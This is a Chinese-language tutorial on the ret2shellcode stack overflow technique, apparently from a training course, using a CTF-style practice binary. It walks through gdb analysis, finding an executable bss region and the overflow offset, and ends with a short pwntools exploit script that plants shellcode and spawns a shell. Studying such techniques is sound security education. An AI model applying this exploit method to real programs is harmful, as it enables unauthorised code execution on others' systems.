缓冲区溢出——基本ROP-ret2shellcode

本文视频:
如果文字过于枯燥,可观看在线视频:https://edu.51cto.com/sd/16514

基础知识:

ret2shellcode,即控制程序执行 shellcode 代码。shellcode 指的是用于完成某个功能的汇编代码,常见的功能主要是获取目标系统的 shell。一般来说,shellcode 需要我们自己填充。这其实是另外一种典型的利用方法,即此时我们需要自己去填充一些可执行的代码。

在栈溢出的基础上,要想执行 shellcode,需要对应的 binary 在运行时,shellcode 所在的区域具有可执行权限。

第一步:分析程序代码

使用gdb ./ret2shellcode加载程序,在命令行中输入checksec来查看启用的保护

缓冲区溢出-基本ROP-ret2shellcode

可以发现没有启用任何保护

我们使用disass main来看下main函数的汇编代码

缓冲区溢出-基本ROP-ret2shellcode

这里对strncpy函数做分析,strncpy的api为:char *strncpy(char *dest,char *src,int size_t);第一个参数是接收的变量,第二个是从那里复制,第三个是复制多少。经过分析第一个参数就是[esp],第二个参数是[esp+0x4],第三个参数是[esp+0x8],这样我们知道最终要复制的内容要放到[esp]中,而现在[esp]是0x804a080。

缓冲区溢出-基本ROP-ret2shellcode

经过分析发现调用了gets函数和strncpy函数,其中gets函数存在溢出漏洞,但是该程序没有使用system("/bin/sh"),我们可以尝试让程序跳转到我们的shellcode中,也就是说gets函数接收的不再是普通的字符串而是我们构建好的shellcode。

我们看下0x804a080地址在哪里:

第一种方法:使用IDA

缓冲区溢出-基本ROP-ret2shellcode

第二种方法:在gdb里运行readelf,或者在linux的shell里运行readelf -S xxx查看bss段位置

缓冲区溢出-基本ROP-ret2shellcode

是一个BSS段,如果可以我们讲shellcode放到bss段中,然后将函数的返回值改为0x804a080,现在还缺少一个条件,就是bss段0x804a080是否有执行权限,我们断点调试下:

执行b main 进行断点

执行r 运行程序

执行vmmap查看是否有执行权限

缓冲区溢出-基本ROP-ret2shellcode

0x804a080的区间是在标红的0x0804a000到0x0804b000,有x执行权限

第二步:查找程序溢出的偏移量

重新执行gdb ./ret2shellcode命令加载程序

执行pattern create 200创建字符串

执行 r运行

输入刚才创建的字符串

缓冲区溢出-基本ROP-ret2shellcode

得到0x41384141地址,我们使用pattern offset 0x41384141来查看偏移

缓冲区溢出-基本ROP-ret2shellcode

然后可以想到溢出代码:

from pwn import *

p=process('./ret2shellcode')

shellcode=asm(shellcraft.sh())

buf2_addr=0x804a080

p.sendline(shellcode.ljust(112,'a') + p32(buf2_addr))

p.interactive()

#####

shellcode.ljust(112,'a')这段代码就是要讲shellcode不足112长度的地方用a来填充。

缓冲区溢出——基本ROP-ret2shellcode